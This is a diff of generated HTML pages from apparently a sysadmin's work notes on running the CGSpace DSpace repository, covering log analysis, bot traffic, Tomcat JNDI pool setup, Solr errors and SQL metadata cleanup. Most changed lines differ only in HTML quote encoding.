<li>Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:</li>
</ul>
<pre tabindex="0"><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>I guess there&rsquo;s nothing I can do to them for now</li>
<li>In other news, I am curious how many PostgreSQL connection pool errors we&rsquo;ve had in the last month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-1* | grep -v :0
<pre tabindex="0"><code>$ grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-1* | grep -v :0
dspace.log.2017-11-07:15695
dspace.log.2017-11-08:135
dspace.log.2017-11-17:1298
@ -476,7 +476,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>I re-deployed the <code>5_x-prod</code> branch on CGSpace, applied all system updates, and restarted the server</li>
<li>Looking through the dspace.log I see this error:</li>
</ul>
<pre tabindex="0"><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I don&rsquo;t have time now to look into this but the Solr sharding has long been an issue!</li>
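<li>The usual workaround for a stale Lucene lock (a sketch, untested here) is to stop Tomcat and remove the lock file named in the error before restarting:</li>
</ul>
<pre tabindex="0"><code>$ rm /home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>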
<li>Looking into using JDBC / JNDI to provide a database pool to DSpace</li>
@ -484,23 +484,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>First, I uncomment <code>db.jndi</code> in <em>dspace/config/dspace.cfg</em></li>
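<li>That is, a one-line change (sketch):</li>
</ul>
<pre tabindex="0"><code>db.jndi = jdbc/dspace
</code></pre><ul>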
<li>Then I create a global <code>Resource</code> in the main Tomcat <em>server.xml</em> (inside <code>GlobalNamingResources</code>):</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&quot;jdbc/dspace&quot; auth=&quot;Container&quot; type=&quot;javax.sql.DataSource&quot;
driverClassName=&quot;org.postgresql.Driver&quot;
url=&quot;jdbc:postgresql://localhost:5432/dspace&quot;
username=&quot;dspace&quot;
password=&quot;dspace&quot;
initialSize='5'
maxActive='50'
maxIdle='15'
minIdle='5'
maxWait='5000'
validationQuery='SELECT 1'
testOnBorrow='true' /&gt;
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspace&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspace&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;50&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>Most of the parameters are from comments by Mark Wood about his JNDI setup: <a href="https://jira.duraspace.org/browse/DS-3564">https://jira.duraspace.org/browse/DS-3564</a></li>
<li>Then I add a <code>ResourceLink</code> to each web application context:</li>
</ul>
<pre tabindex="0"><code>&lt;ResourceLink global=&quot;jdbc/dspace&quot; name=&quot;jdbc/dspace&quot; type=&quot;javax.sql.DataSource&quot;/&gt;
<pre tabindex="0"><code>&lt;ResourceLink global=&#34;jdbc/dspace&#34; name=&#34;jdbc/dspace&#34; type=&#34;javax.sql.DataSource&#34;/&gt;
</code></pre><ul>
<li>I am not sure why several guides show configuration snippets for <em>server.xml</em> and web application contexts that use both a local and a global JDBC resource&hellip;</li>
<li>When DSpace can&rsquo;t find the JNDI context (for whatever reason) you will see this in the dspace logs:</li>
@ -535,11 +535,11 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</code></pre><ul>
<li>And indeed the Catalina logs show that it failed to set up the JDBC driver:</li>
</ul>
<pre tabindex="0"><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
<pre tabindex="0"><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class &#39;org.postgresql.Driver&#39;
</code></pre><ul>
<li>There are several copies of the PostgreSQL driver installed by DSpace:</li>
</ul>
<pre tabindex="0"><code>$ find ~/dspace/ -iname &quot;postgresql*jdbc*.jar&quot;
<pre tabindex="0"><code>$ find ~/dspace/ -iname &#34;postgresql*jdbc*.jar&#34;
/Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
/Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
@ -561,8 +561,8 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
<li>Oh that&rsquo;s fantastic, now at least Tomcat doesn&rsquo;t print an error during startup, so I guess it succeeds in creating the JNDI pool</li>
<li>DSpace starts up but I have no idea if it&rsquo;s using the JNDI configuration because I see this in the logs:</li>
</ul>
<pre tabindex="0"><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
<pre tabindex="0"><code>2017-12-19 13:26:54,271 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS is &#39;{}&#39;PostgreSQL
2017-12-19 13:26:54,277 INFO org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is &#39;{}&#39;9.5.10
2017-12-19 13:26:54,293 INFO org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
2017-12-19 13:26:54,306 INFO org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
</code></pre><ul>
@ -669,7 +669,7 @@ javax.naming.NoInitialContextException: Need to specify class name in environmen
<li>There are short bursts of connections up to 10, but it generally stays around 5</li>
<li>Test and import 13 records to CGSpace for Abenet:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
</code></pre><ul>
<li>The fucking database went from 47 to 72 to 121 connections while I was importing, so it stalled.</li>
@ -687,7 +687,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<li>Linode alerted that CGSpace was using high CPU this morning around 6 AM</li>
<li>I&rsquo;m playing with reading all of a month&rsquo;s nginx logs into goaccess:</li>
</ul>
<pre tabindex="0"><code># find /var/log/nginx -type f -newermt &quot;2017-12-01&quot; | xargs zcat --force | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># find /var/log/nginx -type f -newermt &#34;2017-12-01&#34; | xargs zcat --force | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>I can see interesting things using this approach, for example:
<ul>
@ -708,23 +708,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<ul>
<li>Looking at some old notes for metadata to clean up, I found a few hundred corrections in <code>cg.fulltextstatus</code> and <code>dc.language.iso</code>:</li>
</ul>
<pre tabindex="0"><code># update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
<pre tabindex="0"><code># update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
DELETE 17
# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
# update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
UPDATE 49
# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
# update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
UPDATE 4
# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
# update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
UPDATE 16
# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
# update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
UPDATE 9
# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
# update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
UPDATE 1
# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
# update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
DELETE 20
</code></pre><ul>
<li>I need to figure out why we have records with language <code>in</code> because that&rsquo;s not a language!</li>
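<li>A query like this sketch should find the offending records:</li>
</ul>
<pre tabindex="0"><code>dspace=# select resource_id, text_value from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;in&#39;;
</code></pre><ul>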
@ -735,7 +735,7 @@ DELETE 20
<li>Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM</li>
<li>Here are the XMLUI logs:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;30/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;30/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
637 207.46.13.106
641 157.55.39.186
715 68.180.229.254
@ -751,7 +751,7 @@ DELETE 20
<li>They identify as &ldquo;com.plumanalytics&rdquo;, which Google says is associated with Elsevier</li>
<li>They only seem to have used one Tomcat session, so that&rsquo;s good; I guess I don&rsquo;t need to add them to the Tomcat Crawler Session Manager valve:</li>
</ul>
<pre tabindex="0"><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>216.244.66.245 seems to be moz.com&rsquo;s DotBot</li>

View File

@ -23,11 +23,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -99,11 +99,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -150,7 +150,7 @@ dspace.log.2018-01-02:34
Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -252,11 +252,11 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -308,7 +308,7 @@ dspace.log.2018-01-02:34
<li>I woke up to more instability on CGSpace: this time UptimeRobot noticed a few rounds of downtime lasting a few minutes each, and Linode also notified of high CPU load from 12 to 2 PM</li>
<li>Looks like I need to increase the database pool size again:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -319,7 +319,7 @@ dspace.log.2018-01-03:1909
<ul>
<li>The active IPs in XMLUI are:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
607 40.77.167.141
611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
663 188.226.169.37
@ -336,12 +336,12 @@ dspace.log.2018-01-03:1909
<li>This appears to be the <a href="https://github.com/internetarchive/heritrix3">Internet Archive&rsquo;s open source bot</a></li>
<li>They seem to be re-using their Tomcat session so I don&rsquo;t need to do anything to them just yet:</li>
</ul>
<pre tabindex="0"><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>The API logs show the normal users:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
32 207.46.13.182
38 40.77.167.132
38 68.180.229.254
@ -361,7 +361,7 @@ dspace.log.2018-01-03:1909
</code></pre><ul>
<li>But they come from hundreds of IPs, many of which are 54.x.x.x:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail -n 30
9 54.144.87.92
9 54.146.222.143
9 54.146.249.249
@ -402,7 +402,7 @@ dspace.log.2018-01-03:1909
<li>CGSpace went down and up a bunch of times last night, and ILRI staff were complaining a lot</li>
<li>The XMLUI logs show this activity:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;4/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;4/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
968 197.211.63.81
981 213.55.99.121
1039 66.249.64.93
@ -421,7 +421,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
</code></pre><ul>
<li>So for this week that is the number one problem!</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -436,7 +436,7 @@ dspace.log.2018-01-04:1559
<li>Peter said that CGSpace was down last night and Tsega restarted Tomcat</li>
<li>I don&rsquo;t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -446,13 +446,13 @@ dspace.log.2018-01-05:0
<li>Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space</li>
<li>I had a look and there is one Apache 2 log file that is 73GB, with lots of this:</li>
</ul>
<pre tabindex="0"><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &quot;9-16-1-RV.doc&quot; in &quot;/home/files/journals/6//articles/9/&quot;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
<pre tabindex="0"><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &#34;9-16-1-RV.doc&#34; in &#34;/home/files/journals/6//articles/9/&#34;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
</code></pre><ul>
<li>I will delete the log file for now and tell Danny</li>
<li>Also, I&rsquo;m still seeing a hundred or so of the &ldquo;ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer&rdquo; errors in the dspace logs, so I need to search the dspace-tech mailing list to see what the cause is</li>
<li>I will run a full Discovery reindex in the meantime to see if it&rsquo;s something wrong with the Discovery Solr core</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 110m43.985s
@ -465,7 +465,7 @@ sys 3m14.890s
<ul>
<li>I&rsquo;m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:</li>
</ul>
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1983+TO+1989]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>I posted a message to the dspace-tech mailing list to see if anyone can help</li>
</ul>
@ -474,7 +474,7 @@ sys 3m14.890s
<li>Advise Sisay about blank lines in some IITA records</li>
<li>Generate a list of author affiliations for Peter to clean up:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4515
</code></pre><h2 id="2018-01-10">2018-01-10</h2>
<ul>
@ -553,10 +553,10 @@ Caused by: org.apache.http.client.ClientProtocolException
<li>I can apparently search for records in the Solr stats core that have an empty <code>owningColl</code> field using this in the Solr admin query: <code>-owningColl:*</code></li>
<li>On CGSpace I see 48,000,000 records that have an <code>owningColl</code> field and 34,000,000 that don&rsquo;t:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:48476327,&quot;start&quot;:0,&quot;docs&quot;:[
$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:34879872,&quot;start&quot;:0,&quot;docs&quot;:[
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:48476327,&#34;start&#34;:0,&#34;docs&#34;:[
$ http &#39;http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:34879872,&#34;start&#34;:0,&#34;docs&#34;:[
</code></pre><ul>
<li>I tested the <code>dspace stats-util -s</code> process on my local machine and it failed the same way</li>
<li>It doesn&rsquo;t seem to be helpful, but the dspace log shows this:</li>
@ -568,12 +568,12 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
<li>Uptime Robot said that CGSpace went down at around 9:43 AM</li>
<li>I looked at PostgreSQL&rsquo;s <code>pg_stat_activity</code> table and saw 161 active connections, but no pool errors in the DSpace logs:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-10
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-10
0
</code></pre><ul>
<li>The XMLUI logs show quite a bit of activity today:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
951 207.46.13.159
954 157.55.39.123
1217 95.108.181.88
@ -587,18 +587,18 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
</code></pre><ul>
<li>The user agent for the top six or so IPs is the same:</li>
</ul>
<pre tabindex="0"><code>&quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34;
</code></pre><ul>
<li><code>whois</code> says they come from <a href="http://www.perfectip.net/">Perfect IP</a></li>
<li>I&rsquo;ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
49096
</code></pre><ul>
<li>Rather than blocking their IPs, I think I might just add their user agent to the &ldquo;badbots&rdquo; zone with Baidu, because they seem to be the only ones using that user agent:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
6796 70.36.107.50
11870 70.36.107.190
17323 70.36.107.49
@ -637,19 +637,19 @@ cache_alignment : 64
<li>Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates</li>
<li>Following up with the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat <code>localhost_access_log</code> at the time of my sharding attempt on my test machine:</li>
</ul>
<pre tabindex="0"><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
